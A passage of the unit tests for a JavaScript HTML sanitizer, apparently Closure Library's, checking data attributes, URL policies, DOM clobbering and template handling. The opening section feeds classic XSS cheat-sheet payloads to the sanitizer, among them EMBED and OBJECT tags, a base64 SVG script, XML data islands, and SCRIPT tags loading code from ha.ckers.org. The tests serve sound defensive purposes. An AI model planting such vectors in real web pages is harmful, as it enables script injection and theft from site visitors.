  xssHtml = '<OBJECT TYPE="text/x-scriptlet" ' +
672
      'DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>';
673
  assertSanitizedHtml(xssHtml, safeHtml);
674

675
  // Using an EMBED tag you can embed a Flash movie that contains XSS. Click
676
  // here for a demo. If you add the attributes allowScriptAccess="never" and
677
  // allownetworking="internal" it can mitigate this risk (thank you to Jonathan
678
  // Vanasco for the info).:
679
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
680
  safeHtml = '';
681
  xssHtml = '<EMBED SRC="http://ha.ckers.org/xss.swf" ' +
682
      'AllowScriptAccess="always"></EMBED>';
683
  assertSanitizedHtml(xssHtml, safeHtml);
684

685
  // You can EMBED SVG which can contain your XSS vector. This example only
686
  // works in Firefox, but it's better than the above vector in Firefox because
687
  // it does not require the user to have Flash turned on or installed. Thanks
688
  // to nEUrOO for this one.
689
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
690
  safeHtml = '';
691
  xssHtml = '<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH' +
692
      ' A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv Mj' +
693
      'AwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB' +
694
      '2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBp' +
695
      'ZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpO' +
696
      'zwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" ' +
697
      'AllowScriptAccess="always"></EMBED>';
698
  assertSanitizedHtml(xssHtml, safeHtml);
699

700
  // XML namespace. The htc file must be located on the same server as your XSS
701
  // vector:
702
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
703
  safeHtml = '<span>XSS</span>';
704
  xssHtml = '<HTML xmlns:xss>' +
705
      '<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">' +
706
      '<xss:xss>XSS</xss:xss>' +
707
      '</HTML>';
708
  assertSanitizedHtml(xssHtml, safeHtml);
709

710
  // XML data island with CDATA obfuscation (this XSS attack works only in IE
711
  // and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult
712
  // while auditing Yahoo:
713
  // Browser support: [IE6.0|NS8.1-IE]
714
  safeHtml = isIE9() ? '<span><span></span></span>' :
715
                       '<span><span><span>]]&gt;</span></span></span>' +
716
          '<span></span>';
717
  xssHtml = '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]>' +
718
      '<![CDATA[cript:xss=true;">]]>' +
719
      '</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>';
720
  assertSanitizedHtml(xssHtml, safeHtml);
721

722
  // HTML+TIME in XML. This is how Grey Magic hacked Hotmail and Yahoo!. This
723
  // only works in Internet Explorer and Netscape 8.1 in IE rendering engine
724
  // mode and remember that you need to be between HTML and BODY tags for this
725
  // to work:
726
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
727
  safeHtml = '<span></span>';
728
  xssHtml = '<HTML><BODY>' +
729
      '<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">' +
730
      '<?import namespace="t" implementation="#default#time2">' +
731
      '<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;' +
732
      'alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">' +
733
      '</BODY></HTML>';
734
  assertSanitizedHtml(xssHtml, safeHtml);
735

736
  // IMG Embedded commands - this works when the webpage where this is injected
737
  // (like a web-board) is behind password protection and that password
738
  // protection works with other commands on the same domain. This can be used
739
  // to delete users, add users (if the user who visits the page is an
740
  // administrator), send credentials elsewhere, etc.... This is one of the
741
  // lesser used but more useful XSS vectors:
742
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
743
  safeHtml = '<img />';
744
  xssHtml = '<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?' +
745
      'somevariables=maliciouscode">';
746
  assertSanitizedHtml(xssHtml, safeHtml);
747

748
  // This was tested in IE, your mileage may vary. For performing XSS on sites
749
  // that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex
750
  // filter "/<script[^>]+src/i":
751
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
752
  safeHtml = '';
753
  xssHtml = '<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
754
  assertSanitizedHtml(xssHtml, safeHtml);
755

756
  safeHtml = '';
757
  xssHtml = '<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
758
  assertSanitizedHtml(xssHtml, safeHtml);
759

760
  // This XSS still worries me, as it would be nearly impossible to stop this
761
  // without blocking all active content:
762
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
763
  safeHtml = 'PT SRC="http://ha.ckers.org/xss.js"&gt;';
764
  xssHtml = '<SCRIPT>document.write("<SCRI");<\/SCRIPT>PT ' +
765
      'SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
766
  assertSanitizedHtml(xssHtml, safeHtml);
767

768
  // US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding
769
  // with 7 bits instead of 8. This XSS may bypass many content filters but
770
  // only works if the host transmits in US-ASCII encoding, or if you set the
771
  // encoding yourself. This is more useful against web application firewall
772
  // cross site scripting evasion than it is server side filter evasion. Apache
773
  // Tomcat is the only known server that transmits in US-ASCII encoding. I
774
  // highly suggest anyone interested in alternate encoding issues look at my
775
  // charsets issues page:
776
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
777
  // NOTE(danesh): We'd sanitize this if we received the (mis-)appropriately
778
  // encoded version of this.
779
  // safeHtml = ' script alert( XSS ) /script ';
780
  // xssHtml = '¼script¾alert(¢XSS¢)¼/script¾';
781
  // assertSanitizedHtml(xssHtml, safeHtml);
782

783
  // Escaping JavaScript escapes. When the application is written to output some
784
  // user information inside of a JavaScript like the following:
785
  // <SCRIPT>var a="$ENV{QUERY_STRING}";<\/SCRIPT> and you want to inject your
786
  // own JavaScript into it but the server side application escapes certain
787
  // quotes you can circumvent that by escaping their escape character. When
788
  // this gets injected it will read
789
  // <SCRIPT>var a="\\";alert('XSS');//";<\/SCRIPT> which ends up un-escaping
790
  // the double quote and causing the Cross Site Scripting vector to fire.
791
  // The XSS locator uses this method.:
792
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
793
  // NOTE(danesh): We expect this to fail. More of a JS sanitizer check or a
794
  // server-side template vulnerability test.
795
  // safeHtml = '';
796
  // xssHtml = '\";alert(window);//';
797
  // assertSanitizedHtml(xssHtml, safeHtml);
798
}
799

800

801
/**
 * Checks the handling of data-* attributes: the default sanitizer is expected
 * to drop them, and a sanitizer built with allowDataAttributes is expected to
 * keep only the listed attribute.
 */
function testDataAttributes() {
  // Default configuration: the data attribute must not appear in the output.
  assertSanitizedHtml(
      '<div data-xyz="test">Testing</div>', '<div>Testing</div>');

  // Only 'data-goomoji' is whitelisted, so 'data-other' must be removed.
  var whitelistingSanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                                  .allowCssStyles()
                                  .allowDataAttributes(['data-goomoji'])
                                  .build();
  assertSanitizedHtml(
      '<div data-goomoji="test" data-other="xyz">Testing</div>',
      '<div data-goomoji="test">Testing</div>', whitelistingSanitizer);
}
814

815

816
/**
 * Checks that building a sanitizer throws for each of the attribute lists
 * below when they are passed to allowDataAttributes.
 */
function testDisallowedDataWhitelistingAttributes() {
  var rejectedWhitelists = [
    // A name without the "data-" prefix.
    ['datai'],
    // Disallow internal attribute used by html sanitizer
    ['data-i', 'data-sanitizer-safe']
  ];
  goog.array.forEach(rejectedWhitelists, function(attributeNames) {
    assertThrows(function() {
      new goog.html.sanitizer.HtmlSanitizer.Builder()
          .allowDataAttributes(attributeNames)
          .build();
    });
  });
}
830

831

832
/**
 * Checks that, with form tags allowed, a form whose name is "body" is
 * expected to come back without the name attribute.
 */
function testFormBody() {
  var formSanitizer =
      new goog.html.sanitizer.HtmlSanitizer.Builder().allowFormTag().build();
  assertSanitizedHtml(
      '<form name="body">stuff</form>', '<form>stuff</form>', formSanitizer);
}
839

840

841
/**
 * Checks that a STYLE element and its contents are expected to be removed
 * entirely by the default sanitizer.
 */
function testStyleTag() {
  assertSanitizedHtml(
      '<STYLE>P.special {color : green;border: solid red;}</STYLE>', '');
}
846

847

848
/**
 * Checks a sanitizer restricted with onlyAllowTags (tag names given in mixed
 * case): the img and hr elements in the input are expected to come back as
 * empty spans.
 */
function testOnlyAllowTags() {
  var input = '<div><img id="bar" name=foo class="c d" ' +
      'src="http://wherever.com">' +
      '<a href=" http://www.google.com">hi</a>' +
      '<br>Test.<hr><div align="right">Test</div></div>';
  // If we were mimicking goog.labs.html.sanitizer, our output would be
  // '<div><a>hi</a><br>Test.<div>Test</div></div>';
  var expected = '<div><span></span>' +
      '<a href="http://www.google.com">hi</a>' +
      '<br>Test.<span></span><div align="right">Test</div></div>';
  var restrictedSanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                                .onlyAllowTags(['bR', 'a', 'DIV'])
                                .build();
  assertSanitizedHtml(input, expected, restrictedSanitizer);
}
863

864

865
/**
 * Checks that onlyAllowTags throws when given the tag name 'x'.
 */
function testDisallowNonWhitelistedTags() {
  var allowUnknownTag = function() {
    var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
    builder.onlyAllowTags(['x']);
  };
  assertThrows('Should error on elements not whitelisted', allowUnknownTag);
}
870

871

872
/**
 * Checks the output of the default sanitizer: the img is expected to lose
 * its id, name, class and src attributes, while the link hrefs are kept (the
 * leading space in the first href is expected to be removed).
 */
function testDefaultPoliciesAreApplied() {
  var input = '<img id="bar" name=foo class="c d" ' +
      'src="http://wherever.com">' +
      '<a href=" http://www.google.com">hi</a>' +
      '<a href=ftp://whatever.com>another</a>';
  var expected = '<img /><a href="http://www.google.com">hi</a>' +
      '<a href="ftp://whatever.com">another</a>';
  assertSanitizedHtml(input, expected);
}
882

883

884
/**
 * Checks that a custom name policy is applied: the img name attribute is
 * expected to come back with the prefix added by the policy.
 */
function testCustomNamePolicyIsApplied() {
  var prefixName = function(name) {
    return 'myOwnPrefix-' + name;
  };
  var input = '<img id="bar" name=foo class="c d" ' +
      'src="http://wherever.com"><a href=" http://www.google.com">hi</a>' +
      '<a href=ftp://whatever.com>another</a>';
  var expected = '<img name="myOwnPrefix-foo" />' +
      '<a href="http://www.google.com">hi</a>' +
      '<a href="ftp://whatever.com">another</a>';
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .withCustomNamePolicy(prefixName)
                      .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
898

899

900
/**
 * Checks that a custom token policy is applied: the id and each class token
 * of the img are expected to come back with the prefix added by the policy.
 */
function testCustomTokenPolicyIsApplied() {
  var prefixToken = function(name) {
    return 'myOwnPrefix-' + name;
  };
  var input = '<img id="bar" name=foo class="c d" ' +
      'src="http://wherever.com"><a href=" http://www.google.com">hi</a>' +
      '<a href=ftp://whatever.com>another</a>';
  var expected = '<img id="myOwnPrefix-bar" ' +
      'class="myOwnPrefix-c myOwnPrefix-d" />' +
      '<a href="http://www.google.com">hi</a>' +
      '<a href="ftp://whatever.com">another</a>';
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .withCustomTokenPolicy(prefixToken)
                      .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
915

916

917
/**
 * Checks that a custom token policy and a custom name policy can be combined
 * on one sanitizer, each prefixing the attributes it is responsible for.
 */
function testMultipleCustomPoliciesAreApplied() {
  var tokenPolicy = function(token) {
    return 'plarpalarp-' + token;
  };
  var namePolicy = function(name) {
    return 'larlarlar-' + name;
  };
  var input = '<img id="bar" name=foo class="c d" ' +
      'src="http://wherever.com"><a href=" http://www.google.com">hi</a>' +
      '<a href=ftp://whatever.com>another</a>';
  var expected = '<img id="plarpalarp-bar" name="larlarlar-foo" ' +
      'class="plarpalarp-c plarpalarp-d" />' +
      '<a href="http://www.google.com">hi</a>' +
      '<a href="ftp://whatever.com">another</a>';
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .withCustomTokenPolicy(tokenPolicy)
                      .withCustomNamePolicy(namePolicy)
                      .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
934

935

936
/**
 * Checks a name policy that rejects (returns null for) every name not
 * starting with 'A': name=foo is expected to be dropped, name=Alacrity kept.
 */
function testNonTrivialCustomPolicy() {
  var namePolicy = function testNamesMustBeginWithTheLetterA(name) {
    if (name.charAt(0) == 'A') {
      return name;
    }
    return null;
  };
  var input = '<img id="bar" name=foo class="c d" src="http://wherever.com">' +
      '<a href=" http://www.google.com" name=Alacrity>hi</a>' +
      '<a href=ftp://whatever.com>another</a>';
  var expected =
      '<img /><a href="http://www.google.com" name="Alacrity">hi</a>' +
      '<a href="ftp://whatever.com">another</a>';
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .withCustomNamePolicy(namePolicy)
                      .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
949

950

951
/**
 * Checks that, with goog.html.SafeUrl.sanitize installed as the network
 * request URL policy, http, https and protocol-relative img src values are
 * expected to be preserved.
 */
function testNetworkRequestUrlsAllowed() {
  var input = '<img id="bar" name=foo class="c d" src="http://wherever.com">' +
      '<img src="https://secure.wherever.com">' +
      '<img alt="test" src="//wherever.com">' +
      '<a href=" http://www.google.com">hi</a>' +
      '<a href=ftp://whatever.com>another</a>';
  var expected = '<img src="http://wherever.com" />' +
      '<img src="https://secure.wherever.com" />' +
      '<img alt="test" src="//wherever.com" />' +
      '<a href="http://www.google.com">hi</a>' +
      '<a href="ftp://whatever.com">another</a>';
  var sanitizer =
      new goog.html.sanitizer.HtmlSanitizer.Builder()
          .withCustomNetworkRequestUrlPolicy(goog.html.SafeUrl.sanitize)
          .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
967

968

969
/**
 * Checks a network request URL policy that rejects (returns null for) any URL
 * containing a '?': the src with a query string is expected to be dropped.
 */
function testCustomNRUrlPolicyMustNotContainParameters() {
  var rejectQueryStrings = function(url) {
    if (url.match(/\?/)) {
      return null;
    }
    return goog.html.testing.newSafeUrlForTest(url);
  };
  var input = '<img id="bar" class="c d" src="http://wherever.com">' +
      '<img src="https://www.bank.com/withdraw?amount=onebeeeelion">';
  var expected = '<img src="http://wherever.com" /><img />';
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .withCustomNetworkRequestUrlPolicy(rejectQueryStrings)
                      .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
981

982

983
/**
 * Checks that URL policies receive policy hints (tagName, attributeName) and
 * can use them to rewrite URLs differently per element: image-like src values
 * go through an image proxy, link hrefs through a link proxy.
 */
function testPolicyHints() {
  // Proxies the src of img and input elements; rejects everything else.
  var networkRequestUrlPolicy = function(url, policyHints) {
    var isImageLikeTag =
        policyHints.tagName == 'img' || policyHints.tagName == 'input';
    if (isImageLikeTag && policyHints.attributeName == 'src') {
      return goog.html.testing.newSafeUrlForTest('https://imageproxy/?' + url);
    }
    return null;
  };
  // Proxies the href of anchors; other URLs get the standard sanitization.
  var urlPolicy = function(url, policyHints) {
    var isAnchorHref =
        policyHints.tagName == 'a' && policyHints.attributeName == 'href';
    return isAnchorHref ?
        goog.html.testing.newSafeUrlForTest('https://linkproxy/?' + url) :
        goog.html.SafeUrl.sanitize(url);
  };
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .allowFormTag()
                      .withCustomNetworkRequestUrlPolicy(networkRequestUrlPolicy)
                      .withCustomUrlPolicy(urlPolicy)
                      .build();

  // TODO(user): update this test to include a stylesheet once they're
  //   supported (in order to view both branches of the NRUrlPolicy).
  var input = '<img src="http://image"> <input type="image" ' +
      'src="http://another"><a href="http://link">a link</a>' +
      '<form action="http://formaction"></form>';
  var expected = '<img src="https://imageproxy/?http://image" /> ' +
      '<input type="image" src="https://imageproxy/?http://another" />' +
      '<a href="https://linkproxy/?http://link">a link</a>' +
      '<form action="http://formaction"></form>';
  assertSanitizedHtml(input, expected, sanitizer);
}
1020

1021

1022
/**
 * Checks that the network request URL policy is also consulted for URLs in
 * inline CSS, using a policy that only accepts https URLs and, for the
 * 'background-image' CSS property, only URLs under https://www.google.com/.
 */
function testNRUrlPolicyAffectsCssSanitization() {
  var httpsOnlyPolicy = function(url, policyHints) {
    // Network request URLs may only be over https.
    if (!/^https:\/\//i.test(url)) {
      return null;
    }
    // CSS background URLs may only come from google.com.
    if (policyHints.cssProperty === 'background-image' &&
        !/^https:\/\/www\.google\.com\//i.test(url)) {
      return null;
    }
    return goog.html.SafeUrl.sanitize(url);
  };
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .allowCssStyles()
                      .withCustomNetworkRequestUrlPolicy(httpsOnlyPolicy)
                      .build();

  // Errors raised by the two CSS checks below are ignored on IE8 only.
  var rethrowUnlessIE8 = function(err) {
    if (!isIE8()) {
      throw err;
    }
  };

  var sanitizedHtml;
  try {
    sanitizedHtml = sanitizer.sanitize(
        '<div style="background: url(\'https://www.google.com/i.png\')"></div>');
    if (isIE9()) {
      // On IE9 the output is expected to be empty; the test ends here.
      assertEquals('', goog.html.SafeHtml.unwrap(sanitizedHtml));
      return;
    }
    assertRegExp(
        /background(?:-image)?:.*url\(.?https:\/\/www.google.com\/i.png.?\)/,
        getStyle(sanitizedHtml));
  } catch (err) {
    rethrowUnlessIE8(err);
  }

  try {
    sanitizedHtml = sanitizer.sanitize(
        '<div style="background: url(\'https://wherever/\')"></div>');
    assertNotContains(
        'https://wherever/', goog.html.SafeHtml.unwrap(sanitizedHtml));
  } catch (err) {
    rethrowUnlessIE8(err);
  }

  // Both img sources are https, so each is expected to round-trip unchanged.
  goog.array.forEach(
      ['<img src="https://www.google.com/i.png">', '<img src="https://wherever/">'],
      function(imgHtml) {
        assertSanitizedHtml(imgHtml, imgHtml, sanitizer);
      });
}
1075

1076

1077
/**
 * Checks which img src schemes are expected to survive when
 * goog.html.SafeUrl.sanitize is the network request URL policy: http, https
 * and ftp are kept, the "garbage:" and "data:" sources are dropped.
 */
function testAllowOnlyHttpAndHttpsAndFtpForNRUP() {
  var input = [
    '<img src="http://whatever">',
    '<img src="https://whatever">',
    '<img src="ftp://nope">',
    '<img src="garbage:nope">',
    '<img src="data:yep">'
  ].join('');
  var expected = [
    '<img src="http://whatever" />',
    '<img src="https://whatever" />',
    '<img src="ftp://nope">',
    '<img />',
    '<img />'
  ].join('');
  var sanitizer =
      new goog.html.sanitizer.HtmlSanitizer.Builder()
          .withCustomNetworkRequestUrlPolicy(goog.html.SafeUrl.sanitize)
          .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
1094

1095

1096
/**
 * Checks which anchor href values are expected to survive when
 * goog.html.SafeUrl.sanitize is the URL policy. Each entry of the input list
 * lines up with the entry at the same position in the expected list.
 */
function testUriSchemesOnNonNetworkRequestUrls() {
  var input = [
    '<a href="ftp://yep">something</a>',
    '<a href="gopher://yep">something</a>',
    '<a href="gopher:nope">something</a>',
    '<a href="http://yep">something</a>',
    '<a href="https://yep">something</a>',
    '<a href="garbage://nope">something</a>',
    '<a href="relative/yup">something</a>',
    '<a href="nope">something</a>',
    '<a>lol</a>'
  ].join('');
  var expected = [
    '<a href="ftp://yep">something</a>',
    '<a>something</a>',
    '<a>something</a>',
    '<a href="http://yep">something</a>',
    '<a href="https://yep">something</a>',
    '<a>something</a>',
    '<a href="relative/yup">something</a>',
    '<a href="nope">something</a>',
    '<a>lol</a>'
  ].join('');
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .withCustomUrlPolicy(goog.html.SafeUrl.sanitize)
                      .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
1120

1121

1122
/**
 * Checks that form inputs named "setAttribute" and "getAttribute" are
 * expected to be sanitized to plain inputs without the name attribute.
 */
function testOverridingGetOrSetAttribute() {
  var formSanitizer =
      new goog.html.sanitizer.HtmlSanitizer.Builder().allowFormTag().build();
  var clobberingForm = '<form>' +
      '<input name=setAttribute />' +
      '<input name=getAttribute />' +
      '</form>';
  assertSanitizedHtml(
      clobberingForm, '<form><input><input></form>', formSanitizer);
}
1132

1133

1134
/**
 * Checks that a "data-sanitizer-foo" attribute in the input is expected to be
 * removed even when an identity token policy is installed.
 */
function testOverridingBookkeepingAttribute() {
  var keepToken = function(token) {
    return token;
  };
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .withCustomTokenPolicy(keepToken)
                      .build();
  assertSanitizedHtml(
      '<div data-sanitizer-foo="1" alt="b">Hello</div>',
      '<div alt="b">Hello</div>', sanitizer);
}
1143

1144

1145
/**
 * Checks that a template element, including its content, is expected to be
 * removed by the default sanitizer.
 */
function testTemplateRemoved() {
  assertSanitizedHtml(
      '<div><template><h1>boo</h1></template></div>', '<div></div>');
}
1150

1151

1152
/**
 * Builds the attribute text 'data-sanitizer-original-tag="<tag>"' used in the
 * expected output of the original-tag tests.
 * @param {string} tag
 * @return {string}
 */
function otag(tag) {
  var attributeName = 'data-sanitizer-original-tag';
  return attributeName + '="' + tag + '"';
}
1160

1161

1162
/**
 * Checks that, with addOriginalTagNames enabled, the unknown <magic> element
 * is expected to become a span carrying its original tag name.
 */
function testOriginalTag() {
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .addOriginalTagNames()
                      .build();
  assertSanitizedHtml(
      '<p>Line1<magic></magic></p>',
      '<p>Line1<span ' + otag('magic') + '></span></p>', sanitizer);
}
1170

1171

1172
/**
 * Checks addOriginalTagNames together with a custom token policy that
 * upper-cases the id "hi", keeps class tokens and rejects everything else.
 */
function testOriginalTagOverwrite() {
  var tokenPolicy = function(token, hints) {
    switch (hints.attributeName) {
      case 'id':
        return token === 'hi' ? 'HI' : null;
      case 'class':
        return token;
      default:
        return null;
    }
  };
  var input = '<div id="qqq">hello' +
      '<a:b id="hi" class="hnn a" boo="3">qqq</a:b></div>';
  var expected = '<div>hello<span ' + otag('a:b') + ' id="HI" class="hnn a">' +
      'qqq</span></div>';
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .addOriginalTagNames()
                      .withCustomTokenPolicy(tokenPolicy)
                      .build();
  assertSanitizedHtml(input, expected, sanitizer);
}
1191

1192

1193
/**
 * Checks that an input-supplied data-sanitizer-original-tag value ("xss") is
 * expected to be replaced by the element's real original tag name.
 */
function testOriginalTagClobber() {
  var sanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                      .addOriginalTagNames()
                      .build();
  assertSanitizedHtml(
      '<a:b data-sanitizer-original-tag="xss"></a:b>',
      '<span ' + otag('a:b') + '></span>', sanitizer);
}
1201

1202

1203
// the tests below investigate how <span> behaves when it is unknowingly put
1204
// as child or parent of other elements due to sanitization. <div> had even more
1205
// problems (e.g. cannot be a child of <p>)
1206

1207

1208
/**
 * Sanitize content (with form tags allowed), let the browser apply its own
 * HTML tree correction by attaching the content to the document, and then
 * assert it matches the expected value. The scratch element is always removed
 * from the document again, even when the assertion fails.
 * @param {string} expected
 * @param {string} input
 */
function assertAfterInsertionEquals(expected, input) {
  var sanitizer =
      new goog.html.sanitizer.HtmlSanitizer.Builder().allowFormTag().build();
  var sanitizedInput = goog.html.SafeHtml.unwrap(sanitizer.sanitize(input));
  var div = document.createElement('div');
  document.body.appendChild(div);
  try {
    div.innerHTML = sanitizedInput;
    goog.testing.dom.assertHtmlMatches(
        expected, div.innerHTML, true /* opt_strictAttributes */);
  } finally {
    // Detach the scratch element even if the assertion threw, so a failing
    // case does not leave stray nodes in the document for later tests.
    div.parentNode.removeChild(div);
  }
}
1226

1227

1228
/**
 * For every whitelisted tag that is not skipped, checks that a span nested
 * inside that tag is left where it is after the markup is attached to the
 * document. Not run on IE8/IE9.
 */
function testSpanNotCorrectedByBrowsersOuter() {
  if (isIE8() || isIE9()) {
    return;
  }
  // empty elements, ok
  var emptyElements = [
    'BR', 'IMG', 'AREA', 'COL', 'COLGROUP', 'HR', 'INPUT', 'SOURCE', 'WBR'
  ];
  // potential problems
  var potentialProblems = ['CAPTION'];
  // weird/not important
  var notImportant = ['NOSCRIPT'];
  // consistent in whitelist, ok
  var consistentInWhitelist = [
    'SELECT', 'TABLE', 'TBODY', 'TD', 'TR', 'TEXTAREA', 'TFOOT', 'THEAD', 'TH'
  ];
  var skippedTags = [].concat(
      emptyElements, potentialProblems, notImportant, consistentInWhitelist);

  var whitelistedTags = goog.object.getKeys(goog.html.sanitizer.TagWhitelist);
  goog.array.forEach(whitelistedTags, function(tag) {
    if (goog.array.contains(skippedTags, tag)) {
      return;
    }
    var lowerTag = tag.toLowerCase();
    var input = '<' + lowerTag + '>a<span></span>a</' + lowerTag + '>';
    assertAfterInsertionEquals(input, input);
  });
}
1261

1262

1263
/**
 * For every whitelisted tag that is not skipped, checks that the tag nested
 * inside a span is left where it is after the markup is attached to the
 * document. Not run on IE8/IE9.
 */
function testSpanNotCorrectedByBrowsersInner() {
  if (isIE8() || isIE9()) {
    return;
  }
  // consistent in whitelist, ok
  var consistentInWhitelist = [
    'CAPTION', 'TABLE', 'TBODY', 'TD', 'TR', 'TEXTAREA', 'TFOOT', 'THEAD', 'TH'
  ];
  // potential problems
  var potentialProblems = ['COL', 'COLGROUP'];
  // empty elements, ok
  var emptyElements = [
    'BR', 'IMG', 'AREA', 'COL', 'COLGROUP', 'HR', 'INPUT', 'SOURCE', 'WBR'
  ];

  var whitelistedTags = goog.object.getKeys(goog.html.sanitizer.TagWhitelist);
  goog.array.forEach(whitelistedTags, function(tag) {
    if (goog.array.contains(consistentInWhitelist, tag) ||
        goog.array.contains(potentialProblems, tag)) {
      return;
    }
    // TODO(pelizzi): Skip testing for FORM tags on Chrome until b/32550695
    // is fixed.
    if (tag == 'FORM' && goog.userAgent.WEBKIT) {
      return;
    }
    var lowerTag = tag.toLowerCase();
    // Empty elements get no closing tag in the generated markup.
    var input = goog.array.contains(emptyElements, tag) ?
        '<span>a<' + lowerTag + '>a</span>' :
        '<span>a<' + lowerTag + '>a</' + lowerTag + '>a</span>';
    assertAfterInsertionEquals(input, input);
  });
}
1300

1301

1302
/**
 * Checks that, once TEMPLATE is taken off the tag blacklist, a template
 * element is expected to be converted to a span with its content kept.
 * The blacklist entry is restored even if the assertion fails, so the shared
 * goog.html.sanitizer.TagBlacklist object does not leak a modified state into
 * other tests.
 */
function testTemplateTagToSpan() {
  var input = '<template alt="yes"><p>q</p></template>';
  var expected = '<span alt="yes"><p>q</p></span>';
  // TODO(pelizzi): use unblockTag once it's available
  delete goog.html.sanitizer.TagBlacklist['TEMPLATE'];
  try {
    assertSanitizedHtml(input, expected);
  } finally {
    goog.html.sanitizer.TagBlacklist['TEMPLATE'] = true;
  }
}
1310

1311

1312
// Constant passed as the first argument to
// goog.html.sanitizer.unsafe.alsoAllowTags by the template tests in this file.
var just = goog.string.Const.from('test');
1313

1314

1315
/**
 * Checks that a template element is expected to pass through unchanged when
 * TEMPLATE is removed from the blacklist and additionally allowed through
 * goog.html.sanitizer.unsafe.alsoAllowTags.
 * The blacklist entry is restored even if building the sanitizer or the
 * assertion fails, so the shared goog.html.sanitizer.TagBlacklist object does
 * not leak a modified state into other tests.
 */
function testTemplateTagWhitelisted() {
  var input = '<div><template alt="yes"><p>q</p></template></div>';
  // TODO(pelizzi): use unblockTag once it's available
  delete goog.html.sanitizer.TagBlacklist['TEMPLATE'];
  try {
    var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
    goog.html.sanitizer.unsafe.alsoAllowTags(just, builder, ['TEMPLATE']);
    assertSanitizedHtml(input, input, builder.build());
  } finally {
    goog.html.sanitizer.TagBlacklist['TEMPLATE'] = true;
  }
}
1324

1325

1326
/**
 * Checks that a template element carrying its own
 * data-sanitizer-original-tag attribute is still expected to be removed
 * entirely by the default sanitizer.
 */
function testTemplateTagFake() {
  assertSanitizedHtml(
      '<template data-sanitizer-original-tag="template">a</template>', '');
}
1331

1332

1333
/**
 * Checks sanitization inside nested template elements when TEMPLATE is
 * allowed: at both nesting levels the unknown <zzz> element is expected to
 * become a span and the script element to be removed.
 * The blacklist entry is restored even if building the sanitizer or the
 * assertion fails, so the shared goog.html.sanitizer.TagBlacklist object does
 * not leak a modified state into other tests.
 */
function testTemplateNested() {
  var input = '<template><p>a</p><zzz alt="a"/><script>z</script><template>' +
      '<p>a</p><zzz alt="a"/><script>z</script></template></template>';
  var expected = '<template><p>a</p><span alt="a"></span><template>' +
      '<p>a</p><span alt="a"></span></template></template>';
  // TODO(pelizzi): use unblockTag once it's available
  delete goog.html.sanitizer.TagBlacklist['TEMPLATE'];
  try {
    var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
    goog.html.sanitizer.unsafe.alsoAllowTags(just, builder, ['TEMPLATE']);
    assertSanitizedHtml(input, expected, builder.build());
  } finally {
    goog.html.sanitizer.TagBlacklist['TEMPLATE'] = true;
  }
}
1345

1346

1347
/**
 * Checks that onlyAllowAttributes with an empty list is expected to strip
 * every attribute from the output.
 */
function testOnlyAllowEmptyAttrList() {
  var noAttributesSanitizer = new goog.html.sanitizer.HtmlSanitizer.Builder()
                                  .onlyAllowAttributes([])
